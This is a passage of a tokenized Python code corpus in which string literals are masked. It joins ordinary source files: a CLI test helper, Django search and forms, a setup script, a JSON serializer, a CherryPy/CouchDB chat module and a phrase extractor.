codecs . 
open ( expand_date ( self . entries_file ) , '<STR_LIT:a>' , '<STR_LIT:utf-8>' ) as f : <EOL> f . write ( contents ) <EOL> def read_entries ( self ) : <EOL> with codecs . open ( expand_date ( self . entries_file ) , '<STR_LIT:r>' , '<STR_LIT:utf-8>' ) as f : <EOL> contents = f . read ( ) <EOL> return contents <EOL> def run_command ( self , command_name , args = None , input = None ) : <EOL> """<STR_LIT>""" <EOL> if args is None : <EOL> args = [ ] <EOL> self . write_config ( self . _settings ) <EOL> args . insert ( <NUM_LIT:0> , command_name ) <EOL> args . insert ( <NUM_LIT:0> , '<STR_LIT>' % self . taxi_dir ) <EOL> args . insert ( <NUM_LIT:0> , '<STR_LIT>' % self . config_file ) <EOL> runner = CliRunner ( ) <EOL> result = runner . invoke ( cli , args , input = input , standalone_mode = False ) <EOL> if result . exception : <EOL> raise result . exception <EOL> return result . output <EOL> class override_settings ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , settings = None , container = None ) : <EOL> self . settings = settings or { } <EOL> self . container = container <EOL> def __call__ ( self , func ) : <EOL> if isinstance ( func , type ) : <EOL> self . container = func <EOL> self . enable ( ) <EOL> return func <EOL> else : <EOL> @ wraps ( func ) <EOL> def inner ( * args , ** kwargs ) : <EOL> self . container = args [ <NUM_LIT:0> ] <EOL> with self : <EOL> return func ( * args , ** kwargs ) <EOL> return inner <EOL> def enable ( self ) : <EOL> if not hasattr ( self . container , '<STR_LIT>' ) : <EOL> self . container . _settings = { } <EOL> self . original_settings = copy . deepcopy ( self . container . _settings ) <EOL> for section , settings in six . iteritems ( self . settings ) : <EOL> if section not in self . container . _settings : <EOL> self . container . _settings [ section ] = { } <EOL> for setting , value in six . iteritems ( settings ) : <EOL> self . container . 
_settings [ section ] [ setting ] = value <EOL> def disable ( self ) : <EOL> self . container . _settings = self . original_settings <EOL> def __enter__ ( self ) : <EOL> self . enable ( ) <EOL> def __exit__ ( self , exc_type , exc_value , traceback ) : <EOL> self . disable ( ) <EOL> def recursive_update ( d , u ) : <EOL> """<STR_LIT>""" <EOL> for k , v in six . iteritems ( u ) : <EOL> if isinstance ( v , collections . Mapping ) : <EOL> r = recursive_update ( d . get ( k , { } ) , v ) <EOL> d [ k ] = r <EOL> else : <EOL> d [ k ] = u [ k ] <EOL> return d </s>
<s> '''<STR_LIT>''' <EOL> from puppet . models import FactValue <EOL> from django . db import DatabaseError <EOL> from django . db . models import Q <EOL> from django . utils . translation import ugettext as _ <EOL> from django . conf import settings <EOL> def search ( q ) : <EOL> '''<STR_LIT>''' <EOL> if q is None or len ( q ) == <NUM_LIT:0> or '<STR_LIT>' not in settings . INSTALLED_APPS : <EOL> return FactValue . objects . none ( ) <EOL> try : <EOL> q . __iter__ ( ) <EOL> except AttributeError : <EOL> q = ( q , ) <EOL> ids = [ ] <EOL> try : <EOL> for key in q : <EOL> base = FactValue . objects . filter ( value__icontains = key ) <EOL> base = base . filter ( <EOL> Q ( fact_name__name = '<STR_LIT>' ) | <EOL> Q ( fact_name__name__startswith = '<STR_LIT>' ) | <EOL> Q ( fact_name__name__startswith = '<STR_LIT>' ) | <EOL> Q ( fact_name__name__startswith = '<STR_LIT>' ) | <EOL> Q ( fact_name__name__startswith = '<STR_LIT>' ) | <EOL> Q ( fact_name__name = '<STR_LIT>' ) | <EOL> Q ( fact_name__name = '<STR_LIT>' ) | <EOL> Q ( fact_name__name = '<STR_LIT>' ) | <EOL> Q ( fact_name__name = '<STR_LIT>' ) | <EOL> Q ( fact_name__name = '<STR_LIT>' ) | <EOL> Q ( fact_name__name = '<STR_LIT>' ) | <EOL> Q ( fact_name__name = '<STR_LIT>' ) | <EOL> Q ( fact_name__name = '<STR_LIT>' ) | <EOL> Q ( fact_name__name = '<STR_LIT>' ) <EOL> ) <EOL> ids . extend ( base . distinct ( ) . values_list ( '<STR_LIT:id>' , flat = True ) ) <EOL> ids = list ( set ( ids ) ) <EOL> ret = FactValue . objects . filter ( pk__in = ids ) <EOL> ret = ret . distinct ( ) . order_by ( '<STR_LIT>' ) <EOL> return ret <EOL> except DatabaseError as e : <EOL> return FactValue . objects . none ( ) <EOL> raise RuntimeError ( _ ( '<STR_LIT>' ) % { '<STR_LIT>' : e } ) </s>
<s> from setuptools import setup <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> classifiers = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> package_data = { '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] } , <EOL> zip_safe = False , <EOL> install_requires = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> if sys . version_info < ( <NUM_LIT:3> , ) : <EOL> uni = unicode <EOL> else : <EOL> uni = str <EOL> import collections <EOL> import json <EOL> import uuid <EOL> from base64 import b64decode <EOL> from base64 import b64encode <EOL> from flowy . result import is_result_proxy , TaskError , SuspendTask , wait <EOL> from flowy . operations import first <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def check_err_and_placeholders ( result , value ) : <EOL> err , placeholders = result <EOL> try : <EOL> wait ( value ) <EOL> except TaskError : <EOL> if err is None : <EOL> err = value <EOL> else : <EOL> err = first ( err , value ) <EOL> except SuspendTask : <EOL> placeholders = True <EOL> return err , placeholders <EOL> def collect_err_and_results ( result , value ) : <EOL> err , results = result <EOL> if not is_result_proxy ( value ) : <EOL> return result <EOL> try : <EOL> wait ( value ) <EOL> except TaskError : <EOL> if err is None : <EOL> err = value <EOL> else : <EOL> err = first ( err , value ) <EOL> except SuspendTask : <EOL> pass <EOL> else : <EOL> if results is None : <EOL> results = [ ] <EOL> results . append ( value ) <EOL> return err , results <EOL> def traverse_data ( value , f = check_err_and_placeholders , initial = ( None , False ) , seen = frozenset ( ) , make_list = True ) : <EOL> if is_result_proxy ( value ) : <EOL> try : <EOL> wait ( value ) <EOL> except TaskError : <EOL> return value , f ( initial , value ) <EOL> except SuspendTask : <EOL> return value , f ( initial , value ) <EOL> return value . __wrapped__ , f ( initial , value ) <EOL> if isinstance ( value , ( bytes , uni ) ) : <EOL> return value , f ( initial , value ) <EOL> res = initial <EOL> if isinstance ( value , collections . Iterable ) : <EOL> if id ( value ) in seen : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> seen = seen | frozenset ( [ id ( value ) ] ) <EOL> if isinstance ( value , collections . 
Mapping ) : <EOL> d = { } <EOL> for k , v in value . items ( ) : <EOL> k_ , res = traverse_data ( k , f , res , seen , make_list = False ) <EOL> v_ , res = traverse_data ( v , f , res , seen , make_list = make_list ) <EOL> d [ k_ ] = v_ <EOL> return d , res <EOL> if ( <EOL> isinstance ( value , collections . Iterable ) <EOL> and isinstance ( value , collections . Sized ) <EOL> ) : <EOL> l = [ ] <EOL> for x in value : <EOL> x_ , res = traverse_data ( x , f , res , seen , make_list = make_list ) <EOL> l . append ( x_ ) <EOL> if make_list : <EOL> return l , res <EOL> return tuple ( l ) , res <EOL> if isinstance ( value , collections . Iterable ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> return value , f ( initial , value ) <EOL> def dumps ( value ) : <EOL> return json . dumps ( _tag ( value ) ) <EOL> def _tag ( value ) : <EOL> if isinstance ( value , uuid . UUID ) : <EOL> return { '<STR_LIT>' : value . hex } <EOL> elif isinstance ( value , bytes ) : <EOL> return { '<STR_LIT>' : b64encode ( value ) . decode ( '<STR_LIT:ascii>' ) } <EOL> elif callable ( getattr ( value , '<STR_LIT>' , None ) ) : <EOL> return _tag ( value . __json__ ( ) ) <EOL> elif isinstance ( value , ( list , tuple ) ) : <EOL> return [ _tag ( x ) for x in value ] <EOL> elif isinstance ( value , dict ) : <EOL> return dict ( ( k , _tag ( v ) ) for k , v in value . items ( ) ) <EOL> return value <EOL> def loads ( value ) : <EOL> return json . loads ( value , object_hook = _obj_hook ) <EOL> def _obj_hook ( obj ) : <EOL> if len ( obj ) != <NUM_LIT:1> : <EOL> return obj <EOL> key , value = next ( iter ( obj . items ( ) ) ) <EOL> if key == '<STR_LIT>' : <EOL> return uuid . UUID ( value ) <EOL> elif key == '<STR_LIT>' : <EOL> return b64decode ( value ) <EOL> return obj </s>
<s> __author__ = '<STR_LIT>' <EOL> from django import forms <EOL> from django . contrib . auth . models import User <EOL> from django . contrib . auth . forms import UserCreationForm <EOL> from django . forms import ModelForm <EOL> from survey . models import UserProfile <EOL> class RegistrationForm ( UserCreationForm ) : <EOL> username = forms . CharField ( max_length = <NUM_LIT:30> , min_length = <NUM_LIT:3> , label = '<STR_LIT>' ) <EOL> email = forms . EmailField ( label = "<STR_LIT>" ) <EOL> password1 = forms . CharField ( widget = forms . PasswordInput , min_length = <NUM_LIT:5> , label = '<STR_LIT>' ) <EOL> password2 = forms . CharField ( widget = forms . PasswordInput , min_length = <NUM_LIT:5> , label = '<STR_LIT>' ) <EOL> class Meta : <EOL> model = User <EOL> fields = ( "<STR_LIT:username>" , "<STR_LIT:email>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> class EditProfileForm ( ModelForm ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( EditProfileForm , self ) . __init__ ( * args , ** kwargs ) <EOL> try : <EOL> self . fields [ '<STR_LIT>' ] . initial = self . instance . user . first_name <EOL> self . fields [ '<STR_LIT>' ] . initial = self . instance . user . last_name <EOL> except User . DoesNotExist : <EOL> pass <EOL> first_name = forms . CharField ( max_length = <NUM_LIT:30> , required = False ) <EOL> last_name = forms . CharField ( max_length = <NUM_LIT:30> , required = False ) <EOL> class Meta : <EOL> model = UserProfile <EOL> fields = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def save ( self , * args , ** kw ) : <EOL> super ( EditProfileForm , self ) . save ( * args , ** kw ) <EOL> self . instance . user . first_name = self . cleaned_data . get ( '<STR_LIT>' ) <EOL> self . instance . user . last_name = self . cleaned_data . get ( '<STR_LIT>' ) <EOL> self . instance . user . save ( ) </s>
<s> import time <EOL> import json <EOL> import cherrypy <EOL> import markdown <EOL> import urllib . parse <EOL> import functools <EOL> import collections <EOL> import hashlib <EOL> def jsonify ( function ) : <EOL> @ functools . wraps ( function ) <EOL> def wrapper ( * args , ** kwargs ) : <EOL> cherrypy . response . headers [ "<STR_LIT:Content-Type>" ] = "<STR_LIT:application/json>" <EOL> return json . dumps ( function ( * args , ** kwargs ) ) . encode ( ) <EOL> return wrapper <EOL> class ChatMixIn ( object ) : <EOL> def create_new_room ( self , room ) : <EOL> self . db . request ( "<STR_LIT:POST>" , "<STR_LIT>" % <EOL> ( self . couchdb_prefix ) , body = room ) <EOL> self . db . request ( "<STR_LIT>" , "<STR_LIT>" % ( <EOL> self . couchdb_prefix , room [ "<STR_LIT>" ] ) ) <EOL> self . db . request ( "<STR_LIT>" , "<STR_LIT>" % ( <EOL> self . couchdb_prefix , room [ "<STR_LIT>" ] ) , body = { <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> } <EOL> } ) <EOL> self . db . request ( "<STR_LIT>" , "<STR_LIT>" % ( <EOL> self . couchdb_prefix , room [ "<STR_LIT>" ] ) , body = { <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> } <EOL> } ) <EOL> return room [ "<STR_LIT>" ] <EOL> def find_room ( self , num_id ) : <EOL> rooms = self . db . request ( "<STR_LIT:GET>" , "<STR_LIT>" <EOL> "<STR_LIT>" % self . couchdb_prefix ) <EOL> s = [ i for i in rooms [ '<STR_LIT>' ] if i [ "<STR_LIT:key>" ] == num_id ] <EOL> return self . db . request ( "<STR_LIT:GET>" , "<STR_LIT>" % <EOL> ( self . couchdb_prefix , s [ <NUM_LIT:0> ] [ '<STR_LIT:id>' ] ) ) if s else None <EOL> def get_n_rooms ( self ) : <EOL> try : <EOL> return len ( self . db . request ( "<STR_LIT:GET>" , ( "<STR_LIT>" <EOL> "<STR_LIT>" ) % self . 
couchdb_prefix ) [ "<STR_LIT>" ] ) <EOL> except KeyError : <EOL> return <NUM_LIT:0> <EOL> @ cherrypy . expose <EOL> def post_message ( self , room , message ) : <EOL> if cherrypy . request . method != "<STR_LIT:POST>" : <EOL> raise cherrypy . HTTPError ( <NUM_LIT> ) <EOL> user = self . get_user ( ) <EOL> if not user : <EOL> raise cherrypy . HTTPError ( <NUM_LIT> ) <EOL> reply , highlight , prepend = None , [ ] , None <EOL> if message . startswith ( "<STR_LIT>" ) and "<STR_LIT:U+0020>" in message : <EOL> reply = message . split ( ) [ <NUM_LIT:0> ] [ <NUM_LIT:2> : ] <EOL> r_msg = self . find_message ( room , reply ) <EOL> if r_msg : <EOL> message = message . replace ( "<STR_LIT>" + reply , "<STR_LIT>" ) <EOL> highlight = [ r_msg ] <EOL> p = self . find_user ( r_msg ) <EOL> if p : <EOL> if p [ "<STR_LIT:name>" ] : <EOL> p = ( "<STR_LIT:@>" + p [ "<STR_LIT:name>" ] . split ( ) [ <NUM_LIT:0> ] ) <EOL> else : <EOL> p = "<STR_LIT>" + p [ "<STR_LIT>" ] <EOL> prepend = p <EOL> else : <EOL> reply = None <EOL> for i in [ j [ <NUM_LIT:1> : ] for j in message . lower ( ) . split ( ) if j . startswith ( "<STR_LIT:@>" ) ] : <EOL> u = list ( self . find_user_by_name ( '<STR_LIT>' . join ( j for j in i if j in <EOL> "<STR_LIT>" ) ) ) <EOL> if u : <EOL> highlight . extend ( u ) <EOL> self . update_user ( user [ "<STR_LIT>" ] , { '<STR_LIT>' : time . time ( ) } ) <EOL> message = { <EOL> '<STR_LIT>' : self . safe ( message ) , <EOL> '<STR_LIT>' : self . onebox_html ( self . markdown ( self . onebox ( message ) ) ) , <EOL> '<STR_LIT:date>' : time . time ( ) , <EOL> '<STR_LIT:user>' : user [ "<STR_LIT>" ] , <EOL> '<STR_LIT>' : self . get_num_id ( ) , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : reply , <EOL> '<STR_LIT>' : highlight , <EOL> '<STR_LIT>' : prepend , <EOL> } <EOL> self . inc_message_count ( room ) <EOL> self . do_get_messages . cache_clear ( ) <EOL> self . db . request ( "<STR_LIT:POST>" , "<STR_LIT>" % <EOL> ( self . 
couchdb_prefix , room ) , body = message ) <EOL> def find_user_by_name ( self , name ) : <EOL> users = self . db . request ( "<STR_LIT:GET>" , "<STR_LIT>" <EOL> "<STR_LIT>" % self . couchdb_prefix ) <EOL> name = '<STR_LIT>' . join ( i for i in name . lower ( ) if i in <EOL> "<STR_LIT>" ) <EOL> if "<STR_LIT>" in users : <EOL> for i in users [ "<STR_LIT>" ] : <EOL> n , i = i [ "<STR_LIT:key>" ] , i [ "<STR_LIT:value>" ] <EOL> if n and name . strip ( ) == n . split ( ) [ <NUM_LIT:0> ] . lower ( ) . strip ( ) : <EOL> yield i <EOL> def find_message ( self , room , num_id ) : <EOL> r = self . db . request ( "<STR_LIT:POST>" , ( "<STR_LIT>" + <EOL> "<STR_LIT>" ) % <EOL> ( self . couchdb_prefix , room ) ) <EOL> if "<STR_LIT>" in r : <EOL> r = [ i for i in r [ "<STR_LIT>" ] if i [ "<STR_LIT:key>" ] == num_id ] <EOL> return r [ <NUM_LIT:0> ] [ "<STR_LIT:value>" ] if r else None <EOL> def markdown ( self , content ) : <EOL> return markdown . markdown ( content , safe_mode = "<STR_LIT>" ) <EOL> @ jsonify <EOL> @ cherrypy . expose <EOL> def read_messages ( self , room = "<STR_LIT>" , last_atime = "<STR_LIT>" ) : <EOL> if self . get_user ( ) : <EOL> self . active_users [ room ] [ self . get_user ( ) [ "<STR_LIT>" ] ] = time . time ( ) <EOL> return self . do_get_messages ( room , last_atime ) <EOL> raise cherrypy . HTTPError ( <NUM_LIT> ) <EOL> @ functools . lru_cache ( <NUM_LIT:100> ) <EOL> def do_get_messages ( self , room , last_atime ) : <EOL> if float ( last_atime ) <= <NUM_LIT:1> : <EOL> last_atime = time . time ( ) - ( <NUM_LIT> * <NUM_LIT> * <NUM_LIT> * <NUM_LIT:7> ) <EOL> user = self . get_user ( ) <EOL> if not user : <EOL> raise cherrypy . HTTPError ( <NUM_LIT> ) <EOL> room_data = self . find_room ( room ) <EOL> if room_data [ "<STR_LIT:type>" ] == "<STR_LIT>" and user [ "<STR_LIT>" ] not in room_data [ "<STR_LIT>" ] : <EOL> raise cherrypy . HTTPError ( <NUM_LIT> ) <EOL> data = self . db . request ( "<STR_LIT:GET>" , ( "<STR_LIT>" <EOL> "<STR_LIT>" ) % ( <EOL> self . 
couchdb_prefix , room , json . dumps ( float ( last_atime ) ) ) ) <EOL> if "<STR_LIT>" in data : <EOL> data = [ i [ '<STR_LIT:value>' ] for i in data [ "<STR_LIT>" ] ] <EOL> else : <EOL> data = [ ] <EOL> data = list ( sorted ( data , key = lambda x : x [ "<STR_LIT:date>" ] ) ) <EOL> if len ( data ) >= <NUM_LIT:50> : <EOL> data = data [ - <NUM_LIT:50> : ] <EOL> for i in data : <EOL> i [ '<STR_LIT:user>' ] = self . find_user ( i [ "<STR_LIT:user>" ] ) <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT:email>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> i [ "<STR_LIT:user>" ] [ "<STR_LIT:name>" ] = self . safe ( i [ "<STR_LIT:user>" ] [ "<STR_LIT:name>" ] ) <EOL> if data : <EOL> last_atime = max ( i [ "<STR_LIT:date>" ] for i in data ) <EOL> for i in data : <EOL> i [ "<STR_LIT>" ] = time . strftime ( "<STR_LIT>" , time . gmtime ( i [ "<STR_LIT:date>" ] ) ) <EOL> return { '<STR_LIT>' : last_atime , '<STR_LIT:data>' : data } <EOL> def inc_message_count ( self , num_id ) : <EOL> room = self . find_room ( num_id ) <EOL> room [ "<STR_LIT>" ] += <NUM_LIT:1> <EOL> self . db . request ( "<STR_LIT>" , "<STR_LIT>" % ( <EOL> self . couchdb_prefix , room [ "<STR_LIT>" ] ) , body = room ) <EOL> @ cherrypy . expose <EOL> def star ( self , room , message_id ) : <EOL> user = self . get_user ( ) <EOL> if not user : <EOL> raise cherrypy . HTTPError ( <NUM_LIT> ) <EOL> d = self . db . 
request ( "<STR_LIT:GET>" , "<STR_LIT>" % ( <EOL> self . couchdb_prefix , room , message_id ) ) <EOL> if user [ "<STR_LIT>" ] not in d [ "<STR_LIT>" ] and user [ "<STR_LIT>" ] != d [ "<STR_LIT:user>" ] : <EOL> d [ "<STR_LIT>" ] . append ( user [ "<STR_LIT>" ] ) <EOL> self . get_starred . cache_clear ( ) <EOL> self . db . request ( "<STR_LIT>" , "<STR_LIT>" % ( <EOL> self . couchdb_prefix , room , message_id ) , body = d ) <EOL> cherrypy . response . headers [ "<STR_LIT:Content-Type>" ] = "<STR_LIT:application/json>" <EOL> return json . dumps ( True ) . encode ( ) <EOL> @ cherrypy . expose <EOL> def unstar ( self , room , message_id ) : <EOL> user = self . get_user ( ) <EOL> if not user : <EOL> raise cherrypy . HTTPError ( <NUM_LIT> ) <EOL> d = self . db . request ( "<STR_LIT:GET>" , "<STR_LIT>" % ( <EOL> self . couchdb_prefix , room , message_id ) ) <EOL> if user [ "<STR_LIT>" ] in d [ "<STR_LIT>" ] and user [ "<STR_LIT>" ] != d [ "<STR_LIT:user>" ] : <EOL> d [ "<STR_LIT>" ] . remove ( user [ "<STR_LIT>" ] ) <EOL> self . get_starred . cache_clear ( ) <EOL> self . db . request ( "<STR_LIT>" , "<STR_LIT>" % ( <EOL> self . couchdb_prefix , room , message_id ) , body = d ) <EOL> cherrypy . response . headers [ "<STR_LIT:Content-Type>" ] = "<STR_LIT:application/json>" <EOL> return json . dumps ( True ) . encode ( ) <EOL> @ jsonify <EOL> @ cherrypy . expose <EOL> @ functools . lru_cache ( <NUM_LIT:100> ) <EOL> def get_starred ( self , room = "<STR_LIT>" ) : <EOL> if self . get_user ( ) : <EOL> last_atime = time . time ( ) - ( <NUM_LIT> * <NUM_LIT> * <NUM_LIT> ) <EOL> data = self . db . request ( "<STR_LIT:GET>" , ( "<STR_LIT>" <EOL> "<STR_LIT>" ) % ( <EOL> self . couchdb_prefix , room , json . dumps ( float ( last_atime ) ) ) ) <EOL> if "<STR_LIT>" in data : <EOL> data = [ i [ '<STR_LIT:value>' ] for i in data [ "<STR_LIT>" ] ] <EOL> else : <EOL> data = [ ] <EOL> for i in data : <EOL> i [ '<STR_LIT:user>' ] = self . 
find_user ( i [ "<STR_LIT:user>" ] ) <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT:email>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT:user>" ] [ "<STR_LIT>" ] <EOL> i [ "<STR_LIT:user>" ] [ "<STR_LIT:name>" ] = self . safe ( i [ "<STR_LIT:user>" ] [ "<STR_LIT:name>" ] ) <EOL> data = sorted ( data , key = lambda x : len ( x [ "<STR_LIT>" ] ) , reverse = True ) <EOL> data = list ( i for i in data if i [ "<STR_LIT>" ] ) [ : <NUM_LIT:10> ] <EOL> data = sorted ( data , key = lambda x : x [ "<STR_LIT:date>" ] , reverse = True ) <EOL> cherrypy . response . headers [ "<STR_LIT:Content-Type>" ] = "<STR_LIT:application/json>" <EOL> h = hashlib . md5 ( "<STR_LIT>" . join ( i [ "<STR_LIT>" ] + str ( len ( i [ "<STR_LIT>" ] ) ) <EOL> for i in data ) . encode ( ) ) . hexdigest ( ) <EOL> for i in data : <EOL> i [ "<STR_LIT>" ] = time . strftime ( "<STR_LIT>" , time . gmtime ( i [ "<STR_LIT:date>" ] ) ) <EOL> return { '<STR_LIT>' : last_atime , '<STR_LIT:data>' : data , '<STR_LIT>' : h } <EOL> raise cherrypy . HTTPError ( <NUM_LIT> ) <EOL> @ jsonify <EOL> @ cherrypy . expose <EOL> def get_user_list ( self , room ) : <EOL> self . active_users [ room ] = { k : v for k , v in <EOL> self . active_users [ room ] . items ( ) if time . time ( ) - v < <NUM_LIT:10> } <EOL> r = list ( self . find_user ( i ) for i in self . active_users [ room ] . 
keys ( ) ) <EOL> for i in r : <EOL> del i [ "<STR_LIT:email>" ] <EOL> del i [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT>" ] <EOL> del i [ "<STR_LIT>" ] <EOL> i [ "<STR_LIT:name>" ] = self . safe ( i [ "<STR_LIT:name>" ] ) <EOL> data = sorted ( r , key = lambda x : x [ "<STR_LIT>" ] or "<STR_LIT>" ) <EOL> h = hashlib . md5 ( "<STR_LIT>" . join ( i [ "<STR_LIT>" ] <EOL> for i in data ) . encode ( ) ) . hexdigest ( ) <EOL> return { "<STR_LIT:data>" : data , "<STR_LIT>" : h } <EOL> @ cherrypy . expose <EOL> def remove_user_from_room ( self , room , num_id ) : <EOL> room_num_id = room <EOL> room = self . find_room ( room ) <EOL> user = self . get_user ( ) <EOL> if user and user [ "<STR_LIT>" ] == room [ "<STR_LIT>" ] : <EOL> if num_id in room [ "<STR_LIT>" ] : <EOL> room [ "<STR_LIT>" ] . remove ( num_id ) <EOL> self . db . request ( "<STR_LIT>" , "<STR_LIT>" % ( <EOL> self . couchdb_prefix , room [ "<STR_LIT>" ] ) , body = room ) <EOL> self . do_get_messages . cache_clear ( ) <EOL> raise cherrypy . HTTPRedirect ( "<STR_LIT>" % room_num_id ) <EOL> @ jsonify <EOL> @ cherrypy . expose <EOL> def add_user_to_room ( self , room , user_url = "<STR_LIT>" ) : <EOL> room_num_id = room <EOL> room = self . find_room ( room ) <EOL> user = self . get_user ( ) <EOL> if user and user [ "<STR_LIT>" ] == room [ "<STR_LIT>" ] : <EOL> u = urllib . parse . urlparse ( user_url ) . path . split ( "<STR_LIT:/>" ) <EOL> if len ( u ) > <NUM_LIT:2> and u [ <NUM_LIT:1> ] == "<STR_LIT>" and self . find_user ( u [ <NUM_LIT:2> ] ) : <EOL> if u [ <NUM_LIT:2> ] not in room [ "<STR_LIT>" ] : <EOL> room [ "<STR_LIT>" ] . append ( u [ <NUM_LIT:2> ] ) <EOL> self . db . request ( "<STR_LIT>" , "<STR_LIT>" % ( <EOL> self . 
couchdb_prefix , room [ "<STR_LIT>" ] ) , body = room ) <EOL> raise cherrypy . HTTPRedirect ( "<STR_LIT>" % room_num_id ) </s>
<s> import sys <EOL> class RefPhrases ( object ) : <EOL> '''<STR_LIT>''' <EOL> tot_ref_phrases = <NUM_LIT:0> <EOL> phrasesDict = { } <EOL> sentPhrasesDoD = { } <EOL> def __init__ ( self , sent_id , refFiles ) : <EOL> '''<STR_LIT>''' <EOL> self . loadReferencePhrases ( sent_id , refFiles ) <EOL> def loadReferencePhrases ( self , sent_id , refFiles ) : <EOL> '''<STR_LIT>''' <EOL> sys . stderr . write ( "<STR_LIT>" ) <EOL> refHLst = [ open ( file , '<STR_LIT:r>' ) for file in refFiles ] <EOL> for file_i , refH in enumerate ( refHLst ) : <EOL> sys . stderr . write ( "<STR_LIT>" % ( refFiles [ file_i ] ) ) <EOL> sent_i = sent_id <EOL> for sent in refH : <EOL> sent = sent . strip ( ) <EOL> self . xtractPhrases ( sent_i , sent ) <EOL> sent_i += <NUM_LIT:1> <EOL> refH . close ( ) <EOL> def xtractPhrases ( self , sent_i , sent ) : <EOL> '''<STR_LIT>''' <EOL> refToks = sent . split ( ) <EOL> sent_len = len ( refToks ) <EOL> if not RefPhrases . sentPhrasesDoD . has_key ( sent_i ) : <EOL> RefPhrases . sentPhrasesDoD [ sent_i ] = { } <EOL> for ref_j in xrange ( sent_len ) : <EOL> for ref_k in xrange ( ref_j + <NUM_LIT:1> , sent_len + <NUM_LIT:1> ) : <EOL> ref_phr = '<STR_LIT:U+0020>' . join ( refToks [ ref_j : ref_k ] ) <EOL> if RefPhrases . phrasesDict . has_key ( ref_phr ) : <EOL> RefPhrases . phrasesDict [ ref_phr ] += <NUM_LIT:1> <EOL> else : <EOL> RefPhrases . phrasesDict [ ref_phr ] = <NUM_LIT:1> <EOL> RefPhrases . tot_ref_phrases += <NUM_LIT:1> <EOL> if not RefPhrases . sentPhrasesDoD [ sent_i ] . has_key ( ref_phr ) : <EOL> RefPhrases . sentPhrasesDoD [ sent_i ] [ ref_phr ] = <NUM_LIT:1> <EOL> return None <EOL> @ classmethod <EOL> def isValidRefPhr ( cls , ref_phr ) : <EOL> return cls . phrasesDict . has_key ( ref_phr ) <EOL> @ classmethod <EOL> def isValidRefPhrNSent ( cls , sent_id , ref_phr ) : <EOL> if not cls . sentPhrasesDoD . has_key ( sent_id ) : <EOL> sys . stderr . write ( "<STR_LIT>" % ( sent_id ) ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> return cls . 
